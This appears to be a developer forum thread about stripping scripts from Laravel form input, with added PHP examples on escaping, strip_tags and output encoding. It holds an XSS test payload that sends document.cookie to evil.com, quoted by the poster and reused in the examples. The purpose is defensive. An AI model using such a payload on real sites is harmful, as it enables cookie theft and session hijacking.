
insight:

How to sanitize HTML & JavaScript in form fields?

Dear Friends, I have a long form for a job application and I tried to sanitize it with

use Elegant\Sanitizer\Sanitizer;

I tried it like this, in the method below:

    public function AddApplication(Request $request)
    {
        $validator = Validator::make($request->all(), [
            'inputName' => 'required',
            'inputPost' => 'required|integer',
            'identification_document_type' => 'required',
            'email' => 'required|max:255',
            'inputPermanent' => 'required',
            'inputCommunication' => 'required',
            'inputState' => 'required|string',
            'inputDistrict' => 'required|string',
            'degree_name.*' => 'required',
            'universityorboard.*' => 'required',
            'subject' => 'required|array',
            'subject.*' => 'required',
            'course_type.*' => 'required',
            'institution' => 'required|array',
            'institution.*' => 'required',
            'courseduration.*' => 'required',
            'percentage.*' => 'required',
            'passyear.*' => 'required|max:40',
            'upload.*' => 'required|file|mimes:pdf|max:5120',
            'course.*' => [
                'nullable',
                'string',
            ],
            'specialization.*' => [
                'nullable',
                'string',
            ],
            'institution_additional.*' => [
                'nullable',
                'string',
            ],
            'upload_additional.*' => 'nullable|file|mimes:pdf|max:2048',
            'date_of_expiry.*' => 'nullable|date',
            'organization.*' => [
                'nullable',
                'string',
            ],
            'Designation.*' => [
                'nullable',
                'string',
            ],
            'jobrole.*' => [
                'nullable',
                'string',
            ],
            'responsibility.*' => [
                'nullable',
                'string',
            ],
            'fromdate.*' => [
                'nullable',
                'date',
            ],
            'todate.*' => [
                'nullable',
                'date',
            ],
            'uploadworkexperience.*' => 'nullable|mimes:pdf|max:2048', // maximum 2MB per file
            'inputPassport' => 'required|image|mimes:jpeg,jpg,png|max:1024',
            'identification_document' => 'required|mimes:pdf|max:1024',
            'inputSignature' => 'required|image|mimes:jpeg,jpg,png|max:50',
            'inputAddlSkill' => 'nullable|string',
            'inputAge' => 'nullable|integer|min:18|max:65',
            //'inputDOB' => 'required|date_format:Y-m-d|before:today',
            'inputDOB' => 'required|date_format:Y-m-d|before:' . now()->subYears(18)->format('Y-m-d'),
            'inputGender' => 'required|integer',
            'inputMobile' => 'required|integer|digits:10',
            'notification_id' => 'required|integer',
        ], [
            'inputDOB.before' => 'You must be at least 18 years old. Please update the Date of Birth field',
            'inputAge.min' => 'The input age must be at least 18,please update Date of Birth field',
            'inputAge.max' => 'The input age must not be greater than 65,please update Date of Birth field',
            'identification_document.required' => 'Please upload an identification document in PDF less than 1 MB',
        ]);
        if ($validator->fails()) {
            // Validation failed
            $errors = $validator->errors();
            $errorMessages = [];
            foreach ($errors->messages() as $field => $fieldErrors) {
                foreach ($fieldErrors as $errorMessage) {
                    $errorMessages[] = [
                        'message' => $errorMessage,
                        'field' => $field
                    ];
                }
            }
            return response()->json(['errors' => $errorMessages], 400);
        } else {
            // Validation passed
            // The second argument is a field => filters map (the keyed form used in the
            // later replies, e.g. 'subject.*' => 'trim|escape|strip_tags'). Passed as a
            // plain list like this, the keys are 0 and 1 and match no field name.
            $sanitizer = new Sanitizer($request->all(), ['trim', 'escape']);
            $sanitizedData = $sanitizer->sanitize();
            // Debug output left in from testing: nothing after exit() runs while it is here.
            print_r($sanitizedData);
            exit();
            $post_id = $sanitizedData['inputPost'];
            $post_code = $sanitizedData['postCode'];
            $post_year = $sanitizedData['postYear'];
            // Perform further processing or save the data
            //$post_id = $request->input('inputPost');
            $app_no = "KSITM-" . $post_code . "/" . $post_year . "/";
            $query = ApplicationModel::query();
            $query->selectRaw('MAX(app_ref_code) AS max_app_ref_code')
                ->where('post_id', $post_id);
            $results = $query->get();
            $app_no_table = $results[0]->max_app_ref_code;
            $app_no_table++;
            $app_no_save = $app_no . $app_no_table;
            //First save in ksitm_applications table with passport photo & signature upload
            //$notification_id = $request->input('notification_id');
            $notification_id = $sanitizedData['notification_id'];
            //$applicant_name = $request->input('inputName');
            $applicant_name = $sanitizedData['inputName'];
            //$date_of_birth = $request->input('inputDOB');
            $date_of_birth = $sanitizedData['inputDOB'];
            //$age = $request->input('inputAge');
            $age = $sanitizedData['inputAge'];
            //$totalExperience = $request->input('totalExperience');
            $totalExperience = $sanitizedData['totalExperience'];
            //$gender = $request->input('inputGender');
            $gender = $sanitizedData['inputGender'];
            //$state = $request->input('inputState');
            $state = $sanitizedData['inputState'];
            //$dist = $request->input('inputDistrict');
            $dist = $sanitizedData['inputDistrict'];
            //$mobile_no = $request->input('inputMobile');
            $mobile_no = $sanitizedData['inputMobile'];
            //$email = $request->input('email');
            $email = $sanitizedData['email'];
            //$identification_document_type = $request->input('identification_document_type');
            $identification_document_type = $sanitizedData['identification_document_type'];
            //$marital_status =  $request->input('inputMarital');
            $marital_status = $sanitizedData['inputMarital'];
            
            $permanent_address = $sanitizedData['inputPermanent'];
            
           
            $communication_address = $sanitizedData['inputCommunication'];
            

            //$additional_skills = $request->input('inputAddlSkill');
            $additional_skills = $sanitizedData['inputAddlSkill'];
            $app_ref_code = $app_no_table;
            $app_year = date("Y");
            $app_status = "new";
            if ($request->file('inputPassport')) {
                //$inputPassport = $request->file('inputPassport');
                //$inputPassport = (object) $sanitizer->sanitize('inputPassport');
                $inputPassport = $sanitizedData['inputPassport'];
                $app_no_save_file = str_replace('/', '-', $app_no_save);
                // getClientOriginalExtension() comes from the client-supplied file name;
                // Laravel's docs recommend $file->extension(), which is derived from the
                // file's contents and so matches what the mimes: rule actually validated.
                $photoName = $app_no_save_file . '.' . $inputPassport->getClientOriginalExtension();
                $location = 'applicant_photo';
                $inputPassport->move($location, $photoName);
            }
            if ($request->file('identification_document')) {
                //$identification_document = $request->file('identification_document');
                //$identification_document = (object) $sanitizer->sanitize('identification_document');
                $identification_document = $sanitizedData['identification_document'];
                $app_no_save_file_photoid = str_replace('/', '-', $app_no_save);
                $photoidName = $app_no_save_file_photoid . '.' . $identification_document->getClientOriginalExtension();
                $location = 'applicant_photo_id';
                $identification_document->move($location, $photoidName);
            }
            if ($request->file('inputSignature')) {
                //$inputSignature = $request->file('inputSignature');
                //$inputSignature = (object) $sanitizer->sanitize('inputSignature');
                $inputSignature = $sanitizedData['inputSignature'];
                $app_no_save_file = str_replace('/', '-', $app_no_save); // Replace slashes with hyphens
                $signName = $app_no_save_file . '.' . $inputSignature->getClientOriginalExtension();
                $location = 'applicant_sign';
                $inputSignature->move($location, $signName);
            }
            $application = new ApplicationModel;
            $application->app_no = $app_no_save;
            $application->notification_id = $notification_id;
            $application->post_id = $post_id;
            $application->applicant_name = $applicant_name;
            $application->date_of_birth = $date_of_birth;
            $application->age = $age;
            $application->identification_document = $photoidName;
            $application->gender = $gender;
            $application->state = $state;
            $application->dist = $dist;
            $application->mobile_no = $mobile_no;
            $application->email = $email;
            $application->total_experience = $totalExperience;
            $application->identification_document_type = $identification_document_type;
            $application->photo = $photoName;
            $application->signature = $signName;
            $application->marital_status = $marital_status;
            $application->permanent_address = $permanent_address;
            $application->communication_address = $communication_address;
            $application->additional_skills = $additional_skills;
            $application->app_ref_code = $app_ref_code;
            $application->app_year = $app_year;
            $application->app_status = $app_status;
            $application->save();
            $app_id = $application->id;
            $app_no = $application->app_no;
            // Store Work Experience Details (if any)
            //$organizations = $request->input('organization');
            //$organizations = $sanitizer->sanitize('organization');
            if (isset($sanitizedData['organization'])) {
                $organizations = $sanitizedData['organization'];
            }
            //$designations = $request->input('Designation');
            if (isset($sanitizedData['Designation'])) {
                $designations = $sanitizedData['Designation'];
            }
            if (isset($sanitizedData['jobrole'])) {
                $jobroles = $sanitizedData['jobrole'];
            }
            if (isset($sanitizedData['responsibility'])) {
                $responsibilities = $sanitizedData['responsibility'];
            }
            if (isset($sanitizedData['fromdate'])) {
                $fromdates = $sanitizedData['fromdate'];
            }
            if (isset($sanitizedData['todate'])) {
                $todates = $sanitizedData['todate'];
            }
            if (isset($sanitizedData['uploadworkexperience'])) {
                $uploads = $sanitizedData['uploadworkexperience'];
            }
            if (isset($organizations) && isset($designations) && isset($jobroles) && isset($responsibilities) && isset($fromdates) && isset($todates) && isset($uploads)) {
                foreach ($organizations as $key => $organization) {
                    $WorkExperience = new WorkExperienceModel;
                    $WorkExperience->app_id = $app_id;
                    $WorkExperience->exp_organisation = $organization;
                    $WorkExperience->exp_designation = $designations[$key];
                    $WorkExperience->exp_job_role = $jobroles[$key];
                    $WorkExperience->exp_responsibilities = $responsibilities[$key];
                    $WorkExperience->exp_work_from = $fromdates[$key];
                    $WorkExperience->exp_work_to = $todates[$key];
                    // Convert the dates to DateTime objects
                    $fromDate = new DateTime($fromdates[$key]);
                    $toDate = new DateTime($todates[$key]);
                    // Calculate the difference between the two dates
                    $interval = $fromDate->diff($toDate);
                    // Extract the difference components
                    $years = $interval->y;
                    $months = $interval->m;
                    $days = $interval->d;
                    // Output the result
                    $difference = "$years years $months months $days days";
                    $WorkExperience->exp_tenure = $difference;
                    // Client-supplied file name (Symfony strips any directory part, the rest is
                    // kept as sent) stored under the web-served public/ directory; the mimes:
                    // rule checked the file content, not this name.
                    $filename = $uploads[$key]->getClientOriginalName();
                    if (file_exists(public_path('work_experience') . '/' . $filename)) {
                        // Get the current timestamp
                        $timestamp = time();
                        $exp_certificate = $timestamp . '_' . $filename;
                        $uploads[$key]->move(public_path('work_experience'), $exp_certificate);
                        $WorkExperience->exp_certificate = $exp_certificate;
                    } else {
                        // The file does not exist, so move it to the destination folder
                        $uploads[$key]->move(public_path('work_experience'), $filename);
                        $exp_certificate = $filename;
                        $WorkExperience->exp_certificate = $exp_certificate;
                    }

                    $WorkExperience->save();
                }
            }
            // Educational Qualification 
            //$degree_names = $request->input('degree_name');
            //$degree_names = $sanitizer->sanitize('degree_name');
            $degree_names = $sanitizedData['degree_name'];
            //$university = $request->input('universityorboard');
            $university = $sanitizedData['universityorboard'];
            //$subject = $request->input('subject');
            $subject = $sanitizedData['subject'];
            //$course_type = $request->input('course_type');
            $course_type = $sanitizedData['course_type'];
            //$institution = $request->input('institution');
            $institution = $sanitizedData['institution'];
            //$courseduration = $request->input('courseduration');
            $courseduration = $sanitizedData['courseduration'];
            //$passyear = $request->input('passyear');
            $passyear = $sanitizedData['passyear'];
            //$percentage = $request->input('percentage');
            $percentage = $sanitizedData['percentage'];
            //$qlnuploads = $request->file('upload');
            $qlnuploads = $sanitizedData['upload'];
            if (isset($degree_names)) {
                foreach ($degree_names as $key => $degree_name) {
                    $AppEducation = new AppEducation;
                    $AppEducation->app_id = $app_id;
                    $AppEducation->edn_degree = $degree_name;
                    $AppEducation->edn_subject = $subject[$key];
                    $AppEducation->edn_course_type = $course_type[$key];
                    $AppEducation->edn_institution = $institution[$key];
                    $AppEducation->edn_university = $university[$key];
                    $AppEducation->edn_course_duration = $courseduration[$key];
                    $AppEducation->edn_year_passing = $passyear[$key];
                    $AppEducation->edn_percentage = $percentage[$key];
                    $certificate = $qlnuploads[$key]->getClientOriginalName();
                    if (file_exists(public_path('educational_qualification') . '/' . $certificate)) {
                        // Get the current timestamp
                        $timestamp = time();
                        $edn_certificate = implode('_', [$timestamp, $certificate]);
                        $qlnuploads[$key]->move(public_path('educational_qualification'), $edn_certificate);
                        $AppEducation->edn_certificate = $edn_certificate;
                    } else {
                        // The file does not exist, so move it to the destination folder
                        $qlnuploads[$key]->move(public_path('educational_qualification'), $certificate);
                        $edn_certificate = $certificate;
                        $AppEducation->edn_certificate = $edn_certificate;
                    }
                    $AppEducation->save();
                }
            }
            // Addl Qualification details
            //$courses = $request->input('course');
            if (isset($sanitizedData['course'])) {
                $courses = $sanitizedData['course'];
            }
            //$specialization = $request->input('specialization');
            if (isset($sanitizedData['specialization'])) {
                $specialization = $sanitizedData['specialization'];
            }

            //$institution_additional = $request->input('institution_additional');
            if (isset($sanitizedData['institution_additional'])) {
                $institution_additional = $sanitizedData['institution_additional'];
            }
            //$date_of_expiry = $request->input('date_of_expiry');
            //$date_of_expiry =  $sanitizedData['date_of_expiry'];
            if (isset($sanitizedData['date_of_expiry'])) {
                $date_of_expiry = $sanitizedData['date_of_expiry'];
                // Use the $date_of_expiry variable in your code
            }
            //$upload_additional = $request->file('upload_additional');
            if (isset($sanitizedData['upload_additional'])) {
                $upload_additional = $sanitizedData['upload_additional'];
            }
            if (isset($courses) && isset($specialization) && isset($institution_additional) && isset($upload_additional)) {
                foreach ($courses as $key => $course) {
                    $AddlQualification = new AddlQualification;
                    $AddlQualification->app_id = $app_id;
                    $AddlQualification->addl_course = $course;
                    $AddlQualification->addl_specialization = $specialization[$key];
                    $AddlQualification->addl_institution = $institution_additional[$key];
                    if (!empty($date_of_expiry[$key])) {
                        $AddlQualification->addl_date_of_expiary = $date_of_expiry[$key];
                    } else {
                        // nothing to do
                    }
                    $addl_certificate = $upload_additional[$key]->getClientOriginalName();
                    if (file_exists(public_path('additional_qualification') . '/' . $addl_certificate)) {
                        // Get the current timestamp
                        $timestamp = time();
                        $addl_certificate = implode('_', [$timestamp, $addl_certificate]);
                        $upload_additional[$key]->move(public_path('additional_qualification'), $addl_certificate);
                        $AddlQualification->addl_certificate = $addl_certificate;
                    } else {
                        // The file does not exist, so move it to the destination folder
                        $upload_additional[$key]->move(public_path('additional_qualification'), $addl_certificate);
                        //$addl_certificate = $certificate;
                        $AddlQualification->addl_certificate = $addl_certificate;
                    }
                    $AddlQualification->save();
                }
            }
            return response()->json(['message' => 'Saved successfully', 'app_no' => $app_no, 'app_id' => $app_id, 'mobile_no' => $mobile_no, 'post_id' => $post_id], 200);
        }
    }

But JavaScript still gets saved into the database. How can it be prevented? Please point out the issue in my code.

Waiting for your fast reply

Thanks

Anes P A

0 likes
13 replies
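To make concrete what the controller above is and is not doing, here is an added example (my own stand-alone PHP 8 script, not code from the post or from the Elegant Sanitizer package). It shows the two things the thread turns on: a sanitizer has to walk nested form arrays such as subject[0], subject[1] to reach their string leaves while leaving ints and uploaded-file objects alone, and escaping before storage followed by Blade's {{ }} at output double-encodes the stored text. The names sanitizeDeep, escapeHtml and stripMarkup are mine, the payload is constructed, and a stdClass stands in for Laravel's UploadedFile.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original post. Constructed payload below;
// stdClass stands in for the UploadedFile objects $request->all() would contain.

function check(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

/**
 * Apply $filter to every string anywhere in $data, recursing into arrays.
 * Ints, nulls and objects (uploaded files) are returned untouched, so the
 * caller can still call ->move() on them afterwards. Keys are preserved.
 */
function sanitizeDeep(mixed $data, callable $filter): mixed
{
    if (is_array($data)) {
        return array_map(fn ($v) => sanitizeDeep($v, $filter), $data);
    }

    return is_string($data) ? $filter($data) : $data;
}

/** Encode for an HTML body or attribute context: what the "escape" filter aims at. */
function escapeHtml(string $s): string
{
    return htmlspecialchars(trim($s), ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Drop markup and keep the plain text: what the strip_tags filter does. */
function stripMarkup(string $s): string
{
    return trim(strip_tags($s));
}

/** Constructed payload mirroring the OP's form, including the OP's test script. */
function samplePayload(): array
{
    return [
        'inputName'     => '  Anes <b>P A</b>  ',
        'inputAge'      => 30,
        'subject'       => [
            0 => '<script>alert("sleep");window.location="http://evil.com/?cookie=" + document.cookie</script>',
            1 => 'Computer Science',
        ],
        'inputPassport' => new stdClass(),  // stands in for an UploadedFile
    ];
}

$escaped  = sanitizeDeep(samplePayload(), 'escapeHtml');
$stripped = sanitizeDeep(samplePayload(), 'stripMarkup');

// The nested leaf was reached; the int and the object were left alone.
check(
    $escaped['subject'][0] === '&lt;script&gt;alert(&quot;sleep&quot;);window.location=&quot;http://evil.com/?cookie=&quot; + document.cookie&lt;/script&gt;',
    'subject[0] escaped'
);
check($escaped['subject'][1] === 'Computer Science', 'subject[1] untouched');
check($escaped['inputAge'] === 30 && $escaped['inputPassport'] instanceof stdClass, 'non-strings untouched');

// strip_tags removes the <script> tags but keeps their body as inert text:
// the JavaScript is still in the database, it just cannot run without tags.
check(
    $stripped['subject'][0] === 'alert("sleep");window.location="http://evil.com/?cookie=" + document.cookie',
    'subject[0] stripped'
);
check($stripped['inputName'] === 'Anes P A', 'inputName stripped and trimmed');

// Storing the escaped form and then rendering it with {{ }} (htmlspecialchars again)
// double-encodes: the user sees the literal text "&lt;script&gt;" on the page.
$rendered = htmlspecialchars($escaped['subject'][0], ENT_QUOTES | ENT_HTML5, 'UTF-8');
check(str_starts_with($rendered, '&amp;lt;script&amp;gt;'), 'double-encoded on output');

echo "all checks passed\n";
```

The walker is filter-agnostic on purpose: decide once whether the stored representation is plain text (stripMarkup) or the original text (no filter, encode at output), and apply that everywhere rather than per field.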
Tray2:

Do you mean render it harmless or remove it completely?

Tray2:

@insight That is done by default by Laravel before you store it in the database, unless you have disabled it.

insight:

@Tray2 Then could you please suggest a method to remove it? Because the testing team flagged it as an issue.

jlrdw:

@insight Why don't you use PHP's strip_tags? Do you need the link to the PHP manual?

insight:

@jlrdw But on looking into that option I found this: "No, the strip_tags function in PHP is specifically designed to remove HTML tags from a string. It does not have any effect on JavaScript code or script entries in a form field.

If you want to prevent JavaScript code from being executed when submitting a form, you should handle it on the server-side. When processing the form data, you can validate and sanitize the input to ensure it doesn't contain any potentially malicious code."

I don't think it works for JavaScript.

jlrdw:

@insight It works for JavaScript; you do it on the server side. Give it a try, try to alert:

alert("hello");

JavaScript needs the opening and closing tags, which are stripped.
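A handful of inputs that show where strip_tags() does and does not behave the way the reply above expects, as an added example (my own script, not from the thread). The inputs are constructed; the expected outputs follow PHP's documented strip_tags() behaviour: tags go, their text content stays, an unclosed tag discards the rest of the string, and allowed tags keep every attribute.

```php
<?php
declare(strict_types=1);

// Added example, not from the thread. Constructed inputs for strip_tags().

/** Return [input, allowed tags, strip_tags output] triples for the cases below. */
function stripTagsCases(): array
{
    $cases = [
        // 1. A well-formed <script> block: both tags go, the JavaScript body stays as plain text.
        ['<script>alert("hello");</script>', null],
        // 2. An unclosed tag: strip_tags discards everything from the "<" to the end of the string.
        ['5 years <see attached certificate', null],
        // 3. A "<" followed by whitespace is not treated as a tag and survives.
        ['salary < 50000', null],
        // 4. Entity-encoded markup contains no "<", so it passes through untouched
        //    (harmless in HTML, but not "removed" either).
        ['&lt;script&gt;alert(1)&lt;/script&gt;', null],
        // 5. With an allow-list, the allowed tag keeps all its attributes, event handlers included.
        ['<b onmouseover="alert(1)">bold</b>', '<b>'],
    ];

    $out = [];
    foreach ($cases as [$input, $allowed]) {
        $output = $allowed === null ? strip_tags($input) : strip_tags($input, $allowed);
        $out[] = [$input, $allowed, $output];
    }

    return $out;
}

$expected = [
    'alert("hello");',
    '5 years ',
    'salary < 50000',
    '&lt;script&gt;alert(1)&lt;/script&gt;',
    '<b onmouseover="alert(1)">bold</b>',
];

foreach (stripTagsCases() as $i => [$input, $allowed, $output]) {
    if ($output !== $expected[$i]) {
        throw new RuntimeException("case $i: got " . var_export($output, true));
    }
    printf("case %d: %s => %s\n", $i + 1, var_export($input, true), var_export($output, true));
}
```

Cases 2 and 5 are the ones to remember: strip_tags() can eat legitimate text that merely contains a "<", and an allow-list does not make the kept tags safe.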

insight:

Dear Friends, I got a sanitizer method working with a small change; it works fine, but in the case of array values with dynamic fields like

<input type="text" name="subject[0]" id="subject2" class="form-control subject" required="">
<input type="text" name="subject[1]" id="subject2" class="form-control subject" required="">
...................................

the sanitization does not work with this code:

    // Field => filters map; 'subject' holds the whole subject[] array.
    $valData = [
        'inputName'          => $request->inputName,
        'inputAge'           => $request->inputAge,
        'inputPermanent'     => $request->inputPermanent,
        'inputCommunication' => $request->inputCommunication,
        'inputMobile'        => $request->inputMobile,
        'email'              => $request->email,
        'subject'            => $request->subject,
    ];

    $filters = [
        'inputCommunication' => 'trim|escape',
        'inputName'          => 'trim|escape',
        'inputAge'           => 'trim|escape',
        'inputPermanent'     => 'trim|escape',
        'inputMobile'        => 'trim|escape',
        'email'              => 'trim|escape',
        // Keyed 'subject', this targets the array value itself, not subject[0], subject[1].
        'subject'            => 'trim|escape',
    ];

    $sanitizer = new Sanitizer($valData, $filters);
    $valData   = $sanitizer->sanitize();

    foreach ($valData['subject'] as &$subject) {
        // Illuminate\Support\Stringable has no escape() method; this line throws the
        // BadMethodCallException quoted below. Laravel's escaping helper is e().
        $subject = Str::of($subject)->trim()->escape();
    }
    unset($subject); // drop the reference left behind by the foreach

    print_r($valData['subject']);

I got the error:

"message": "Method Illuminate\Support\Stringable::escape does not exist.",
    "exception": "BadMethodCallException",

Can anybody please advise a method to sanitize arrays?

Thanks

Anes P A

Snapey:

give an example of what is being stored

MohamedTammam:

You don't need to sanitize inputs before storing them in the database. You need to do that when you are adding them to HTML.

PHP has a function to do that called htmlspecialchars, which is used by Laravel's Blade syntax {{ }}.

Blade's {{ }} echo statements are automatically sent through PHP's htmlspecialchars function to prevent XSS attacks.

https://laravel.com/docs/10.x/blade#displaying-data

jlrdw:

@MohamedTammam

You don't need to sanitize inputs before storing them into database.

If it's an API, you don't have control over how the user is getting the data. I always strip_tags before storing data. Storing safe data is very good as well. My opinion.

MohamedTammam:

@jlrdw I don't do that because, no matter what the case is, it should always be sanitized before adding it into HTML/JavaScript. Even if we do sanitize it before storing it in the database, we should still consider a safe way to display it in the front-end.

insight (OP, Best Answer):

@Yacoubalhaidari Thanks for your reply. A simple change makes a big difference. The solution is

'subject.*' => 'trim|escape|strip_tags',

Problem solved

@snapey I tried inserting a script for test purposes:

<script>alert("sleep");
window.location="http://evil.com/?cookie=" + document.cookie
</script>

Thanks

Anes P A

1 like
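The accepted answer stops the test payload from reaching the database, and the earlier replies point out that output encoding is what actually prevents the script from running. As an added example (my own PHP 8 script, not from the thread), here is the OP's test payload encoded for the two places a Laravel view is likely to put it. forHtml() mirrors what Blade's {{ }} does (Laravel's e() helper, which is htmlspecialchars with ENT_QUOTES | ENT_SUBSTITUTE); forJs() is a JSON-based encoding for a value dropped into a script block, the approach Laravel's Illuminate\Support\Js helper takes. The function names are mine and the stored value is constructed from the payload in the accepted answer.

```php
<?php
declare(strict_types=1);

// Added example, not from the thread. STORED is constructed from the OP's test payload.

function check(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

/** HTML body or attribute context: what Blade's {{ }} already does via e(). */
function forHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** JavaScript string context: a JSON literal with <, >, &, ' and " hex-escaped. */
function forJs(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

/** The OP's test payload as it would sit in the database if stored unmodified. */
const STORED = '<script>alert("sleep");' . "\n"
    . 'window.location="http://evil.com/?cookie=" + document.cookie' . "\n"
    . '</script>';

$html = forHtml(STORED);
$js   = forJs(STORED);

// HTML context: no raw "<" survives, so the browser shows the text instead of running it.
check(!str_contains($html, '<'), 'html has no raw <');
check(str_starts_with($html, '&lt;script&gt;'), 'html starts encoded');

// JS context: json_encode escapes the newlines and hex-escapes the angle brackets, so
// `var note = <?= $js ?>;` is one valid string literal that cannot close the <script>.
check(!str_contains($js, '<') && !str_contains($js, "\n"), 'js has no raw < or newline');
check(str_starts_with($js, '"\u003Cscript\u003E'), 'js starts hex-escaped');

// Using the HTML encoding inside a JS literal is the classic mistake: the raw newline is
// still there and splits the "..." literal across lines, a JavaScript syntax error, and
// the entities are only meaningful to an HTML parser, not to the JS engine.
check(str_contains('var note = "' . $html . '";', "\n"), 'html encoding keeps the newline');

echo "html: $html\njs:   $js\n";
```

Pick the encoder by where the value lands, not by what was stored: strip_tags at input time is a reasonable way to keep plain-text fields plain, but it does not replace {{ }} or a JSON encoding at output.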
